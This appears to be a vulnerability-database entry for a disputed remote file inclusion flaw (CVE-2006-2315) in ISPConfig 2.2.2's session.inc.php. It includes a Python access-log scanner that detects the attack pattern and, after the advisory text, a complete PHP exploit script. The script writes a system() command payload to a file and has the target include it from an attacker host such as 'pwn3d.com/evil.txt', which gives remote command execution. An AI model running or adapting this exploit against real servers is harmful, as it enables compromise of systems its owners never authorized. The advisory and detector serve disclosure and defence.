ISPConfig Session.INC.PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1110244    Vulnerability type: Code injection
Published: 2006-05-09    Updated: 2006-12-06
CVE ID: CVE-2006-2315    CNNVD ID: CNNVD-200605-203
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/27845
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-203
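|Vulnerability details
**DISPUTED** A PHP remote file inclusion vulnerability exists in session.inc.php in ISPConfig 2.2.2 and earlier. Remote attackers can execute arbitrary PHP code via a URL in the go_info[server][classes_root] parameter. Note: the vendor disputes this vulnerability, stating that session.inc.php is not under the web root in version 2.2 and that register_globals is not enabled.
|Exploit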
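A detection check for the request pattern described above, added here as an example and not part of the original advisory or of ISPConfig: it scans web-server access-log lines for requests to session.inc.php in which go_info[server][classes_root] carries a URL instead of a local path. The Combined Log Format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request line inside a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# The parameter named in the advisory.
PARAM = "go_info[server][classes_root]"
# A value that begins with a URL scheme or stream wrapper instead of a local path.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:)", re.I)


def find_rfi_attempts(log_lines):
    """Return (line_number, client_ip, value) for each suspicious request.

    Only the query string is inspected; POST bodies are not in access logs.
    """
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith("session.inc.php"):
            continue
        # parse_qsl percent-decodes names and values, so %5B/%5D forms match too.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name == PARAM and REMOTE_RE.match(value):
                hits.append((number, line.split(" ", 1)[0], value))
    return hits


# Constructed sample log lines (documentation IP ranges and example domains).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/May/2006:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [09/May/2006:10:00:05 +0000] "GET /lib/session.inc.php?go_info[server][classes_root]=http://files.example.net/a.txt? HTTP/1.1" 200 90',
    '198.51.100.7 - - [09/May/2006:10:00:09 +0000] "GET /lib/session.inc.php?go_info%5Bserver%5D%5Bclasses_root%5D=ftp%3A%2F%2Ffiles.example.net%2Fa.txt HTTP/1.1" 200 90',
    '192.0.2.10 - - [09/May/2006:10:00:12 +0000] "GET /lib/session.inc.php?go_info[server][classes_root]=/srv/app/lib/classes HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for number, client, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"line {number}: {client} sent classes_root={value!r}")
```

Any hit also indicates that session.inc.php is reachable from the web, which is one of the two conditions the vendor's rebuttal says should not hold.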
source: http://www.securityfocus.com/bid/17909/info

ISPConfig is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects version 2.2.2; other versions may also be affected.

<?php
/*
ISPConfig Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/lib/session.inc.php?go_info[server][classes_root]=
hurl: http://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
    ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>"
    ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>"
    ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>"
    ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
    ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit'])) 
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\"); 
system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
    echo "<p>Unable to get output.\n";
    exit;
}

echo $form;

while (!feof ($file)) {
    $line .= fgets ($file, 1024)."<br>";
    }
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>
|References

Source: MISC
Link: http://www.xorcrew.net/xpa/XPA-ISPConfig.txt
Source: BID
Name: 17909
Link: http://www.securityfocus.com/bid/17909
Source: BUGTRAQ
Name: 20060616 Re: [Bugtraq ID: 17909] ISPConfig Session.INC.PHP Remote File Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/437456/100/200/threaded
Source: OSVDB
Name: 25355
Link: http://www.osvdb.org/25355
Source: MILW0RM
Name: 1762
Link: http://www.milw0rm.com/exploits/1762
Source: MISC
Link: http://www.howtoforge.com/forums/showthread.php?t=4123
Source: VUPEN
Name: ADV-2006-1727
Link: http://www.frsirt.com/english/advisories/2006/1727
Source: SECUNIA
Name: 19994
Link: http://secunia.com/advisories/19994
Source: XF
Name: ispconfig-session-inc-file-include(26299)
Link: http://xforce.iss.net/xforce/xfdb/26299
Source: MILW0RM
Name: 1762
Link: http://milw0rm.com/exploits/1762
Source: FULLDISC
Name: 20060507 [XPA] - ISPConfig <= 2.2.2 - Remote Command Execution Vulnerability
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2006-May/045855.html